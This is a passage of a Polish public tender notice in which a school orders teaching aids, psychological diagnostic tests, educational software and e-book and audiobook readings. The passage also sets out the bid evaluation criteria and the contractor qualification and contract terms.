umiejętności społecznych dziecka. Interwencje przez zabawę. Wydawnictwo książkowe&#34; 2 szt.<br/>45.	EMOCJE I RELACJE SPOŁECZNE - STYMULACJA	2 szt.<br/>46.	Uczę się rozumieć innych. Wydawnictwo książkowe	2 szt.<br/>47.	&#34;Wiem, jak to powiedzieć&#34;. Program rozwijania umiejętności językowych użytkowników alternatywnych i wspomagających metod porozumiewania się (AAC). Budowanie wypowiedzi dwuelementowych. Struktura 1a, 1b 1 szt.<br/>48.	Jak kształtować umiejętności społeczne . Wydawnictwo książkowe.	2 szt.<br/>49.	Wiem, jak to powiedzieć. Budowanie wypowiedzi 3- elementowych- struktura A2- BOX 2 szt.<br/>50.	101 ćwiczeń, gier i zabaw dla dzieci z autyzmem, zespołem Aspergera i zaburzeniami integracji sensorycznej . Książka 1 szt.<br/>51.	Czytam proste teksty. Czytanie ze zrozumieniem na poziomie podstawowym. Cz. 1	2 szt.<br/>52.	Moje układanki. Ćwiczenia sylabowe do nauki czytania. Zestaw 1, 2, 3, 4 2 szt.<br/>53.	Beczka śmiechu - gra 1 szt.<br/>54. Go Sense – słuch i mowa 1 szt.<br/>55. Pakiet pomocy – emocje 1 szt.<br/>56.	Gramatyka jak malowana. Graficzne karty pracy dla klas 4-8 . Karty pracy 2 szt.<br/>57.	Pisanie jak malowane. Redagowanie wypowiedzi. Graficzne karty pracy dla klas 4-8. Karty pracy. 2 szt.<br/>58.	Kim jestem ? . Gra 2 szt.<br/>59.	Sensorki 2 szt.<br/>60.	Piotruś Paka- gra zręcznościowa 2 szt.<br/>61.	Czacha dymi- gra planszowa 2 szt.<br/>62.	Nie mów tak. Nie mów nie. - Gra 1 szt.<br/>63.	Piotruś słuchowy. Gra karciana 2 szt.<br/>64.	Maraton ortograficzny . Gra 2 szt.<br/>65. Trudne słowa . Gra edukacyjna. 2 szt.<br/>66.	Memory- humory . Gra 2 szt.<br/>67.	Ilustrowane karty do nauki zachowań społecznych 2 szt.<br/>68.	Sznurki i dziurki. Wyszywanki bez igły	1 szt.<br/>69.	Pamięć dźwiękowa. Gra 1 szt.<br/>70.	Puzzle warstwowe 1 szt.<br/>71.	Piankowe puzzle magnetyczne 1 szt.<br/>72.	AKADEMIA POMYSŁÓW. UCZEŃ Z LEKKĄ NIEPEŁNOSPRAWNOŚCIĄ INTELEKTUALNĄ ZESTAW - SZKOŁA PODSTAWOWA 1-3	1 szt.<br/>73.	AKADEMIA POMYSŁÓW. UCZEŃ Z AUTYZMEM KLASY 1-3	1 szt.<br/>74.	Świat dźwięków - Zestaw do ćwiczenia percepcji słuchowej i rozwijania koncentracji	1 szt.<br/>75.	Lumico - zestaw narzędzi do pracy nad emocjami, reakcjami, relacjami i zasobami 1 szt.<br/>76.	Góra uczuć, gra. 2 szt.<br/>77.	Pytaki gra planszowa 2 szt.<br/>78.	Gorący ziemniak, gra planszowa 2 szt.<br/>79.	Sokole oko – Foto, gra planszowa.	2 szt.<br/>80.	Emocje. Odkryj siebie i poznaj emocje, gra. 2 szt.<br/>81.	Łamacz lodów DAJ SIĘ POZNAĆ, gra integracyjna.	2 szt.<br/>82.	Memory. Odkryj świat, gra. 2 szt.<br/>83.	Kalambury, gra dla dzieci. 2 szt.<br/>84.	Łowienie rybek, gra zręcznościowa	2 szt.<br/>85.	Gra zręcznościowa typu „twister”. 2 szt.<br/>86.	Rzutki na rzepy, gra zręcznościowa.	2 szt.<br/>87.	MIESIĄCE I PORY ROKU - GRA JĘZYKOWA	1 szt.<br/>88.	Ilustrowane karty do nauki zachowań społecznych 1 szt.<br/>89.	Kalejdoskop emocji, gra towarzyska 1 szt.<br/>90.	Będzie dobrze. Program wspierający kształcenie kompetencji emocjonalno-społecznych	1 szt.<br/>91.	UMIEM CZYTAĆ, PISAĆ I LICZYĆ – KOMPLET	1 szt.<br/>92.	Dobble: Zwierzaki. Gra 1 szt.<br/>93.	GRA SŁÓW, GRA KOOPERACYJNA 1 szt.<br/>94.	ĆWICZENIA OPERACJI MYŚLOWYCH 1 szt.<br/>95. Symetryczne labirynty 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) termin dostawy (T) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4- Narzędzia psychologiczne – testy; część obejmuje następujące pozycje asortymentowe:<br/>1.	&#34;Narzędzie diagnostyczne: Skala Inteligencji Stanford-Binet 5 (SB5)&#34;	1 szt.<br/>2.	Narzędzie diagnostyczne psychologiczne: IDS-2 Skale Inteligencji i Rozwoju dla Dzieci i Młodzieży 1 szt.<br/>3.	Narzędzie diagnostyczne psychologiczne: WISC®-V Skala Inteligencji Wechslera dla Dzieci – wydanie piąte	1 szt.<br/>4.	Narzędzie diagnostyczne psychologiczne: CFT 1-R Neutralny Kulturowo Test Inteligencji Cattella – wersja 1 zrewidowana przez Rudolfa H. Weiβa i Jürgena Osterlanda	1 szt.<br/>5.	Narzędzie diagnostyczne, psychologiczne: CONNERS 3 Zestaw Kwestionariuszy do Diagnozy ADHD i zaburzeń współwystępujących	1 szt.<br/>6.	Narzędzie diagnostyczne , psychologiczne: WS/ZF-R Test Słów i Test Liczb Rudolfa H. Weiβa. 1 szt.<br/>7.	Narzędzie diagnostyczne, psychologiczne: ASRS Zestaw Kwestionariuszy do Diagnozy Spektrum Autyzmu 1 szt.<br/>8.	Narzędzie diagnostyczne, psychologiczne, pedagogiczne: DINEMO - Dwuwymiarowy Inwentarz Inteligencji Emocjonalnej 1 szt.<br/>9.	Narzędzie diagnostyczne, psychologiczne, pedagogiczne: INTE - Kwestionariusz Inteligencji Emocjonalnej INTE 1 szt.<br/>10.	Narzędzie diagnostyczne, psychologiczne, pedagogiczne: TRE - Test Rozumienia Emocji, 1 szt.<br/>11.	Narzędzie diagnostyczne, psychologiczne: BENTON - Test Pamięci Wzrokowej Bentona, 1 szt.<br/>12.	Narzędzie diagnostyczne, psychologiczne: RHLB-PL - Bateria Testów do Badania Funkcji Językowych i Komunikacyjnych Prawej Półkuli Mózgu	1 szt.<br/>13.	Narzędzie diagnostyczne, psychologiczne: WCST - Test Sortowania Kart z Wisconsin	1 szt.<br/>14.	Narzędzie diagnostyczne, Bateria metod diagnozy przyczyn niepowodzeń szkolnych u uczniów w wieku 10-12 lat	1 szt.<br/>15.	Narzędzie diagnostyczne, Bateria metod diagnozy przyczyn niepowodzeń szkolnych u uczniów w wieku 13-15 lat	1 szt.<br/>16.	Narzędzie diagnostyczne, Bateria metod diagnozy przyczyn niepowodzeń szkolnych u uczniów w wieku 10-12 lat - wersja skrócona. BATERIA-10/12S	1 szt.<br/>17.	Narzędzie diagnostyczne, logopedyczne: Obrazkowy Test Słownikowy - Rozumienie OTSR 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) termin dostawy (T) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 - Dydaktyczne oprogramowanie komputerowe, karty pracy; część obejmuje następujące pozycje asortymentowe:<br/><br/>1. mTalent Autyzm 2 (Mowa czynna, od słowa do zdania + Mowa w kontekście społecznym cz.2) <br/> 1 szt.<br/>2. mTalent POTRAFIĘ. Obszar polonistyczny (kl. 4-6)	1 szt.<br/>3. mTALENT KONCENTRACJA I PAMIĘĆ KL. 1-8 1 szt.<br/>4. Pakiet edukacyjny „Program Eduterapeutica specjalne potrzeby edukacyjne 4-8”	1 szt.<br/>5. Pakiet edukacyjny „Program Eduterapeutica specjalne potrzeby edukacyjne 1-3”	1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48190000-6 - Pakiety oprogramowania edukacyjnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37524000-7 - Gry</p> <p class="mb-0">37520000-9 - Zabawki</p> <p class="mb-0">22110000-4 - Drukowane książki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) termin dostawy (T) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6- Lektury szkolne - ebook, audiobook; część obejmuje następujące pozycje asortymentowe:<br/>1.	Lektura e-book &#34;„Asiunia” J. Papuzińska - e-book&#34; 1 szt.<br/>2.	Lektura audiobook	&#34;„Dzieci z Bullerbyn” A. Lindgren audiobook&#34; 1 szt.<br/>3.	Lektura e-book &#34;„Dzieci z Bullerbyn” A. Lindgren e-book&#34;	1 szt.<br/>4.	Lektura audiobook	„Kapelusz Pani Wrony” Danuta Parlak – adiobook	1 szt.<br/>5.	Lektura e-book „Kapelusz Pani Wrony” Danuta Parlak - e-book 1 szt.<br/>6.	Lektura audiobook	„Rany Julek! O tym jak Julian Tuwim został poetą” A. Frączek – audiobook 1 szt.<br/>7.	Lektura e-book „Rany Julek! O tym jak Julian Tuwim został poetą” A. Frączek - r-book 1 szt.<br/>8.	Lektura audiobook	„Afryka Kazika” Ł. Wierzbicki audiobook&#34; 1 szt.<br/>9.	Lektura e-book &#34;„Afryka Kazika” Ł. Wierzbicki - e-book&#34; 1 szt.<br/>10.	Lektura audiobook	„Dziewczynka z parku” B. Kosmowska - audiobook&#34;	1 szt.<br/>11.	Lektura e-book &#34;„Dziewczynka z parku” B. Kosmowska - e-book&#34;	1 szt.<br/>12.	Lektura audiobook	„Oto jest Kasia” M. Jaworczakowa - audiobook&#34; 1 szt.<br/>13.	Lektura e-book „Oto jest Kasia” M. Jaworczakowa - e-book&#34; 1 szt.<br/>14.	Lektura audiobook	„Mania, dziewczyna inna niż wszystkie” J. Grodek - audiobook&#34; 1 szt.<br/>15.	Lektura audiobook	„Kubuś Puchatek” A.A. Milne - audiobook&#34; 1 szt.<br/>16.	Lektura e-book „Kubuś Puchatek” A.A. Milne - e-book&#34; 1 szt.<br/>17.	Lektura audiobook	„Był sobie pies” W.B.cameron - audiobook&#34; 1 szt.<br/>18.	Lektura e-book	1	„Był sobie pies” W.B.cameron - e-book&#34; 1 szt.<br/>19.	Lektura audiobook	„Kołysanka z Auschwitz” M.Escobar - audiobook&#34;	1 szt.<br/>20.	Lektura e-book	1	&#34;„Kołysanka z Auschwitz” M.Escobar - e-book&#34; 1 szt.<br/>21.	&#34;Lektura audiobook klasy IV-VIII&#34; „Akademia pana Kleksa” J. Brzechwa - audiobook&#34; 1szt.<br/>22.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Opowieści z Narnii”L.S. Lewis - audiobook&#34;	1 szt.<br/>23.	&#34;Lektura e-book klasy IV-VIII&#34; „Opowieści z Narnii”L.S. Lewis - e-book&#34; 1 szt.<br/>24.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Chłopcy z placu broni” F. Molnar - audiobook&#34;	1 szt.<br/>25.	&#34;Lektura e-book klasy IV-VIII&#34; „Chłopcy z placu broni” F. Molnar - e-book&#34;	1 szt.<br/>26.	&#34;Lektura audiobook klasy IV-VIII&#34; „W pustyni i w puszczy”H. Sienkiewicz - audiobook&#34; 1 szt.<br/>27.	&#34;Lektura e-book klasy IV-VIII&#34; „W pustyni i w puszczy”H. Sienkiewicz - e-book&#34; 1 szt.<br/>28.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Mały książę” A.S. Exupery – audiobook 1 szt.<br/>29.	&#34;Lektura e-book klasy IV-VIII&#34; „Mały książę” A.S. Exupery - e-book 1 szt.<br/>30.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Mitologia” J. Parandowski - audiobook&#34; 1 szt.<br/>31.	&#34;Lektura e-book klasy IV-VIII&#34; „Hobbit, czyli tam i z powrotem” J.R. Tolkien - audiobook&#34; 1 szt.<br/>32.	&#34;Lektura audiobook klasy IV-VIII&#34; „Hobbit, czyli tam i z powrotem” J.R. Tolkien - e-book&#34; 1 szt.<br/>33.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Ania z Zielonego Wzgórza” L. M. Montgomery - audiobook&#34; 1 szt.<br/>34.	&#34;Lektura e-book klasy IV-VIII&#34; „Ania z Zielonego Wzgórza” L. M. Montgomery - e-book&#34; 1 szt.<br/>35.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Dziady cz.II” A. Mickiewicz - AUDIOBOOK\&#34;	1 szt.<br/>36.	&#34;Lektura e-book klasy IV-VIII&#34; „Dziady cz.II” A. Mickiewicz - E-BOOK&#34; 1 szt.<br/>37.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Quo vadis” H. Sienkiewicz - audiobook&#34;	1 szt.<br/>38.	&#34;Lektura e-book klasy IV-VIII&#34; „Quo vadis” H. Sienkiewicz - e-book&#34; 1 szt.<br/>39.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Pan Tadeusz” A. Mickiewicz - audiobook&#34;	1 szt.<br/>40.	&#34;Lektura e-book klasy IV-VIII&#34; „Pan Tadeusz” A. Mickiewicz - e-book&#34; 1 szt.<br/>41.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Syzyfowe prace”S. Żeromski - audiobook&#34;	1 szt.<br/>42.	&#34;Lektura e-book klasy IV-VIII&#34; „Syzyfowe prace” S. Żeromski - e-book&#34; 1 szt.<br/>43.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Mikołąjek” (Mikołajek / Mikołajek nie nudzi się w szkole / Mikołajek i inne chłopaki / Wakacje Mikołajka / Mikołajek ma kłopoty) komplet Sempe i Goscinny - audiobook&#34; 1 szt.<br/>44.	&#34;Lektura e-book klasy IV-VIII&#34; „Mikołąjek” Sempe i Goscinny - e-book&#34; 1 szt.<br/>45.	&#34;Lektura audiobook klasy IV-VIII&#34; „Kajko i Kokosz. Szkoła latania” J. Christa - audiobook&#34; 1 szt.<br/>46.	&#34;Lektura e-book klasy IV-VIII&#34; „Kajko i Kokosz. Szkoła latania” J. Christa - e-book&#34; 1 szt.<br/>47.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Tajemniczy ogród” F.H. Burnett - audiobook&#34; 1 szt.<br/>48.	&#34;Lektura e-book klasy IV-VIII&#34; „Tajemniczy ogród” F.H. Burnett - ebook&#34; 1 szt.<br/>49.	&#34;Lektura e-book klasy IV-VIII&#34; „Opium w rosole” M. Musierowicz - ebook&#34;	1 szt.<br/>50.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Quo vadis” H. Sienkiewicz - audiobook&#34; 1 szt.<br/>51.	&#34;Lektura e-book klasy IV-VIII&#34; „Quo vadis” H. Sienkiewicz - ebook&#34; 1 szt.<br/>52.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Balladyna” J. Słowacki - audiobbok&#34; 1 szt.<br/>53.	&#34;Lektura e-book klasy IV-VIII&#34; „Balladyna” J. Słowacki - ebook&#34; 1 szt.<br/>54.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Kamienie na szaniec A. Kamiński - audiobbok&#34;	1 szt.<br/>55.	&#34;Lektura e-book klasy IV-VIII&#34; „Kamienie na szaniec” A. Kamiński - ebook&#34;	1 szt.<br/>56.	&#34;Lektura e-book klasy IV-VIII&#34; &#34;Egzamin ósmoklasisty Język angielski - ebook&#34;	1 szt.<br/>57.	&#34;Lektura e-book klasy IV-VIII&#34; &#34;Egzamin ósmoklasisty Język polski - ebook&#34;	1 szt.<br/>58.	&#34;Lektura e-book klasy IV-VIII&#34; &#34;Egzamin ósmoklasisty Matematyka - ebook&#34;	1 szt.<br/>59.	&#34;Lektura audiobook klasy IV-VIII&#34;	„Zemsta” A. Fredro - audiobook&#34; 1 szt.<br/>60.	&#34;Lektura e-book klasy IV-VIII&#34; „Zemsta” A. Fredro - ebook&#34; 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">22113000-5 - Książki biblioteczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) termin dostawy (T) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie wezwany w terminie nie krótszym niż 5 dni od dnia wezwania do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>1)	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt. 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy w zakresie przesłanek wykluczenia z postępowania dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>– wg wzoru stanowiącego załącznik nr 3 do SWZ.<br/><br/>2)	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt. 1, 2 i odnośnie pkt 4 ustawy w zakresie orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>b) art. 108 ust. 1 pkt. 5 ustawy w zakresie przesłanek wykluczenia z postępowania dotyczących przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie,<br/>– wg wzoru stanowiącego załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć :<br/>1. Formularz asortymentowo- cenowy wypełniony wg opisu przedmiotu zamówienia zał. nr 6a/6b/6c/6d/6e/6f, dla części, na którą/e wykonawca składa ofertę. Wypełnienie formularza stanowi potwierdzenie zgodności zaoferowanych produktów z wymogami Zamawiającego. W przypadku gdy Wykonawca nie potwierdzi wymaganych parametrów Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt. 5 ustawy.<br/>2. Oświadczenie Wykonawcy, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania – wg wzoru stanowiącego załącznik nr 2 do SWZ. <br/>3. Pełnomocnictwo do złożenia oferty (jeśli dotyczy), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani są złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z pkt XVI ust. 4 pkt. 4.4 SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie <br/>o którym mowa w art. 125 ustawy składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o udzielnie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia.<br/>5. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian treści zawartej umowy w stosunku do treści złożonej oferty, <br/>w szczególności:<br/>a)	gdy zmiany treści umowy są korzystne dla zamawiającego;<br/>b)	zmian obligatoryjnych wynikających ze zmian przepisów prawa;<br/>c)	wycofania z dystrybucji przedmiotu umowy i zastąpienia go produktem o parametrach nie gorszych niż oferowany, za cenę taką jaka została ustalona w niniejszej umowie,<br/>d)	zmiany terminu dostawy z przyczyn niezależnych od Wykonawcy, w tym siły 